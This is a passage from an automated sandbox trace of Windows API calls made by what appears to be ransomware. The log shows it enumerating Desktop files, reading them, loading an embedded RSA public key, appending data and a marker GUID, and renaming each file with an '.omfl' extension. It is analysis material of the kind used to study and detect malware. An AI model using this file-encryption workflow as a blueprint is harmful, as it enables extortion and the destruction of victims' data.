hHeap=0x4970000) returned 1 [0130.555] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.555] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.555] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.555] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.555] CloseHandle (hObject=0x5c8) returned 1 [0130.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.561] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0xdd29950 [0130.561] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.561] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N tQTV7NDCW8bl354S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n tqtv7ndcw8bl354s.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N tQTV7NDCW8bl354S.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n tqtv7ndcw8bl354s.jpg.omfl")) returned 1 [0130.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.562] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.562] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.564] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.564] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2d1fe50, ftCreationTime.dwHighDateTime=0x1d5d908, ftLastAccessTime.dwLowDateTime=0x39054000, ftLastAccessTime.dwHighDateTime=0x1d5e411, ftLastWriteTime.dwLowDateTime=0x39054000, ftLastWriteTime.dwHighDateTime=0x1d5e411, nFileSizeHigh=0x0, nFileSizeLow=0x8627, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N4e0wUawwqd.flv", cAlternateFileName="N4E0WU~1.FLV")) returned 1 [0130.564] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.564] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.564] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.564] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N4e0wUawwqd.flv") returned=".flv" [0130.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N4e0wUawwqd.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n4e0wuawwqd.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.564] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=34343) returned 1 [0130.564] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.567] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x8601, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.567] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.568] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.568] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.568] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.568] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x8627, lpOverlapped=0x0) returned 1 [0130.569] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.569] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.569] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.569] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.569] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.570] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.570] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.570] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.570] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.570] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.570] GetLastError () returned 0x0 [0130.570] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.570] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.570] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.570] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.570] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.570] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.570] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.570] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.570] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8630) returned 0xdd2c688 [0130.571] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.571] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3088 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c08 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf30d0 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c20 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c50 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c68 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.571] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.571] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.571] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c50 | out: hHeap=0x4970000) returned 1 [0130.571] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c68 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c68 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16c50 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c68 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c50 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.572] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.572] GetCurrentThreadId () returned 0x618 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5e00 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.572] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.573] GetCurrentThreadId () returned 0x618 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.573] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.573] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c50 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c68 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c38 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c80 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.574] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.574] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c50 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c50 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c50 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.575] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.575] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.576] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x8627, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.576] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.576] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.576] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.576] CloseHandle (hObject=0x5c8) returned 1 [0130.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.577] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.578] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N4e0wUawwqd.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n4e0wuawwqd.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\N4e0wUawwqd.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\n4e0wuawwqd.flv.omfl")) returned 1 [0130.580] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14426290, ftCreationTime.dwHighDateTime=0x1d5dea6, ftLastAccessTime.dwLowDateTime=0xc544a180, ftLastAccessTime.dwHighDateTime=0x1d5d86a, ftLastWriteTime.dwLowDateTime=0xc544a180, ftLastWriteTime.dwHighDateTime=0x1d5d86a, nFileSizeHigh=0x0, nFileSizeLow=0x111e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nhmxaszbT2mam.png", cAlternateFileName="NHMXAS~1.PNG")) returned 1 [0130.580] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.580] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.580] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nhmxaszbT2mam.png") returned=".png" [0130.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nhmxaszbT2mam.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nhmxaszbt2mam.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.580] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=70114) returned 1 [0130.581] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.583] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x111bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.583] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.584] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.584] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, 